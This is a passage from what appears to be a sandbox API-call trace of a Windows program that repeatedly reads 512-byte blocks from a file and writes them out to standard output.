(_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 
[0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.425] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.425] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] GetFileType (hFile=0x50) returned 0x1 [0223.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.426] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.427] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.427] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] GetFileType (hFile=0x50) returned 0x1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.427] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 
0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] GetFileType (hFile=0x50) returned 0x1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.428] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.428] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.428] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) 
returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] GetFileType (hFile=0x50) returned 0x1 [0223.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.429] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.430] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.430] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.430] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.431] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.432] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.432] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] GetFileType (hFile=0x50) returned 0x1 [0223.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.432] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] GetFileType (hFile=0x50) returned 0x1 [0223.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.433] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.433] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.433] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.433] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 
lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.434] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, 
lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] GetFileType (hFile=0x50) returned 0x1 [0223.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.435] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.435] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.435] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.436] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] GetFileType (hFile=0x50) returned 0x1 [0223.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.436] WriteFile (in: hFile=0x50, 
